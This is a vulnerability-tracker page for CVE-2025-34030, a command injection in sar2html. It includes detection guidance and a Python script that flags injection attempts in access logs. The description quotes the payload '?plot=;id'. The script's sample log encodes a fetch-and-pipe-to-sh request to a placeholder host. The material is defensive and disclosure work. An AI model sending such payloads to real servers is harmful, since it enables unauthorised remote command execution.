CVE-2025-34030
Published 2025-06-20
Priority P1 · 92 · critical · 10 (CVSS 4.0)
ITW exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 59.07% (99.0th percentile)
An OS command injection vulnerability exists in sar2html version 3.2.2 and prior via the plot parameter in index.php. The application fails to sanitize user-supplied input before using it in a system-level context. Remote, unauthenticated attackers can inject shell commands by appending them to the plot parameter (e.g., ?plot=;id) in a crafted GET request. The output of the command is displayed in the application's interface after interacting with the host selection UI. Successful exploitation leads to arbitrary command execution on the underlying system. Exploitation evidence was observed by the Shadowserver Foundation on 2025-02-04 UTC.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sar2html | sar2html | <= 3.2.2 | — |
Detection & IOCs (extracted from sources)
- Detect OS command injection attempts via the 'plot' parameter in GET requests to index.php; look for shell metacharacters (e.g., semicolons) appended to the parameter value, after URL-decoding it, since `%3B` is the same semicolon.
- Match HTTP responses containing both 'sar2html Ver' and 'Select Host' strings to confirm a vulnerable sar2html instance was successfully reached.
- Monitor for outbound HTTP/DNS callback requests (OAST/interactsh) originating from the web server process following requests to index.php with a semicolon-prefixed plot parameter, indicating successful RCE.
- Active exploitation in the wild was observed by the Shadowserver Foundation on 2025-02-04 UTC; treat any matching request from that date onward as a high-confidence exploitation attempt, and confirm success from a callback or from command output rather than from the request alone.
- The vulnerability is exploitable by unauthenticated, remote attackers; no credentials or prior access are required, which maximises exposure on any internet-facing sar2html deployment.
- Command output is only rendered in the UI after interacting with the host selection element, so passive log-only monitoring of HTTP responses may miss successful exploitation.
- Affected versions are 3.2.2 and prior; detections should target all instances of sar2html at or below this version.
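As an added example that is not part of the page's sources, of sar2html, or of any detection rule the page indexes, the first detection item above applied to web-server access logs: the script parses Apache/nginx combined-format lines, keeps only requests whose path ends in `/index.php`, URL-decodes every `plot` value and flags values containing a shell metacharacter. The log lines are constructed for the example (RFC 5737 documentation addresses, made-up timestamps), the `/sar2html/` path prefix is an assumption, and `example.invalid` is a placeholder callback host.

```python
import re
import urllib.parse
from typing import Dict, List

# Characters that end or chain a shell command when the value reaches a shell
# unquoted (the page's example payload is "plot=;id"). A %0a-encoded newline
# decodes to "\n", which also terminates a command, so it is included.
SHELL_META = re.compile(r"[;|&`$\n]")

# Apache/nginx combined-format access line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (not captured traffic). Line 2 is the same
# injection URL-encoded; line 5 targets a different script and must not match.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Feb/2025:10:12:01 +0000] "GET /sar2html/index.php?plot=;id HTTP/1.1" 200 5123 "-" "python-requests/2.31"
198.51.100.7 - - [04/Feb/2025:10:12:07 +0000] "GET /sar2html/index.php?plot=%3Bcurl%20http%3A%2F%2Fexample.invalid%2Fx%7Csh HTTP/1.1" 200 5200 "-" "curl/8.4"
192.0.2.9 - - [04/Feb/2025:10:13:00 +0000] "GET /sar2html/index.php?plot=cpu HTTP/1.1" 200 6002 "-" "Mozilla/5.0"
192.0.2.9 - - [04/Feb/2025:10:13:05 +0000] "GET /sar2html/index.php?plot=mem&host=web01 HTTP/1.1" 200 6100 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Feb/2025:10:14:00 +0000] "GET /other.php?plot=;id HTTP/1.1" 404 300 "-" "python-requests/2.31"
"""


def plot_values(target: str) -> List[str]:
    """Return every decoded 'plot' value of a request whose path ends in /index.php.

    The query string is split on '&' only. urllib.parse.parse_qs on older Python
    versions also splits on ';', which would strip the very character this
    detection keys on, so the split is done by hand.
    """
    parsed = urllib.parse.urlsplit(target)
    if not parsed.path.endswith("/index.php"):
        return []
    values = []
    for pair in parsed.query.split("&"):
        key, _, raw = pair.partition("=")
        if key == "plot":
            values.append(urllib.parse.unquote_plus(raw))
    return values


def find_plot_injections(log_text: str) -> List[Dict[str, str]]:
    """Flag requests whose decoded plot parameter carries a shell metacharacter."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for value in plot_values(m.group("target")):
            if SHELL_META.search(value):
                hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "status": m.group("status"), "plot": value})
    return hits


if __name__ == "__main__":
    for h in find_plot_injections(SAMPLE_LOG):
        print(f'{h["ts"]} {h["ip"]} status={h["status"]} plot={h["plot"]!r}')
```

Run against the sample, the first two lines are flagged and the legitimate `plot=cpu` / `plot=mem` requests and the `/other.php` request are not. The decoder handles one layer of URL-encoding only; a double-encoded `%253B` decodes to the literal `%3B` and would be missed, so decode twice if the front end is known to do so. A flagged request is an attempt: as the items above note, confirmation of success comes from an outbound callback or from command output in the response, not from the request line.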
CVSS provenance
NVD · CVSS v4.0 · 10.0 CRITICAL · CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
VulnCheck · 10.0 CRITICAL
GHSA
GHSA-f9p6-9wvr-9crm · ghsa_unreviewed · 2025-06-20 · CRITICAL · CWE-20
Description: same text as the CVE description above (without the Shadowserver exploitation note).
VulnCheck
vulncheck · 2025 · CVSS 10.0 · CRITICAL
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Description: same text as the CVE description above, including the Shadowserver exploitation note.
Affected: cemtan Sar2HTML
Required Action: Apply remediatio
No detection rules found.
Nuclei
nuclei · CVSS 10.0 · CRITICAL
sar2html <=3.2.2 Plot Parameter - Remote Code Execution
sar2html version 3.2.2 and prior contains an OS command injection vulnerability in the plot parameter of index.php. A remote, unauthenticated attacker can append shell metacharacters to the plot parameter and execute arbitrary operating system commands.
Template:
id: CVE-2025-34030
info:
  name: sar2html <=3.2.2 Plot Parameter - Remote Code Execution
  author: gy741,TATANKA97
  severity: critical
  description: |
    sar2html version 3.2.2 and prior contains an OS command injection vulnerability in the plot parameter of index.php. A remote, unauthenticated attacker can append shell metacharacters to the plot parameter and execute arbitrary operating system commands.
  impact: |
    Successful exploitation allows unauthenticated remote command execu
No writeups or analysis indexed.
Timeline: 2025-06-20 published · exploited in the wild